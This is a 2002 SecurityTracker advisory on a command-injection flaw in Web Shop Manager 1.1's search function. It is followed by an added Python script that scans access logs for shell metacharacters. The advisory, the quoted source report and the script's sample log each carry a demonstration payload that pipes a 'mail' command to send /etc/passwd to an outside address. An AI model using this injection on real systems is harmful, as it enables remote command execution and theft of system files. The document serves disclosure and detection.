SecurityTracker.com
SecurityTracker
Archives


 


Category:   Application (Commerce)  >   Web Shop Manager
Vendors:   Web Drive Limited
Web Shop Manager Input Validation Bug Lets Remote Users Execute Commands on the System
SecurityTracker Alert ID:  1004969
SecurityTracker URL:  http://securitytracker.com/id/1004969
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 6 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:   An input filtering flaw was reported in Web Drive Limited's Web Shop Manager. A remote user can execute commands on the system.

SecurityBugware reported a remote command execution bug in Web Shop Manager v1.1. The software apparently does not filter certain characters from user-supplied input in the 'search' function. A remote user can supply a pipe character followed by system commands to execute commands on the system.

A demonstration exploit command to mail the password file on a Unix/Linux system to a remote user is provided:

|mail email@address < /etc/passwd

SecurityBugware credits Tacettin Karadeniz [tacettinkaradeniz at yahoo.com] with reporting the flaw.

Impact:   A remote user can execute arbitrary commands on the system with the privileges of the web server CGI process.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.webscriptworld.com/scripts/wsm.phtml
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.
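
Added example (not part of the SecurityTracker entry, the SecurityBugware report or the vendor's code): since no fix was available, one way to review web server access logs for search requests that carry a pipe or related shell metacharacters. The path /shop/search.php, the parameter name "search" and the log lines are constructed assumptions, and the metacharacter set is broader than the single pipe character the report names.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SEARCH_PARAM = "search"  # assumption: query parameter that carries the search term
# The report names the pipe; the other shell metacharacters are an added generalization.
SHELL_META = re.compile(r"[|;`<>]|\$\(")
# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, hypothetical path).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2002:10:01:02 +0000] "GET /shop/search.php?search=red+shoes HTTP/1.0" 200 5120',
    '198.51.100.7 - - [06/Aug/2002:10:03:44 +0000] "GET /shop/search.php?search=%7Cmail+email%40address+%3C+%2Fetc%2Fpasswd HTTP/1.0" 200 312',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so a nested %25-encoded value is seen as the server might see it."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_search(line):
    """Return the decoded search term if it contains shell metacharacters, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qsl performs the first round of decoding ('+' to space, %XX to character).
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == SEARCH_PARAM:
            term = fully_decode(value)
            if SHELL_META.search(term):
                return term
    return None


def flag_lines(lines):
    """Return (client address, decoded term) for every line with a suspicious search term."""
    hits = []
    for line in lines:
        term = suspicious_search(line)
        if term is not None:
            hits.append((line.split(" ", 1)[0], term))
    return hits


if __name__ == "__main__":
    for client, term in flag_lines(SAMPLE_LOG):
        print(f"{client}\t{term!r}")
```

Access logs normally record only the query string, so a search form submitted by POST needs the same check applied at the application or a filtering proxy.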


 Source Message Contents

Subject:  Web Shop Manager


http://www.securitybugware.org/Other/5603.html

SecurityBugware reported a remote command execution bug in Web Shop
Manager v1.1.

According to the report:

Tacettin Karadeniz [tacettinkaradeniz@yahoo.com] found that a remote
user can place some commands in the php-webshop-manager product's search
feature to cause the server to send arbitrary files (such as the
password file) to any e-mail address.  A demonstration exploit command
is provided:
        
   |mail CiLeK@xxxkaradenizeregli.net < /etc/passwd
        
The vendor's URL is:

http://www.webscriptworld.com


 
 



Copyright 2022, SecurityGlobal.net LLC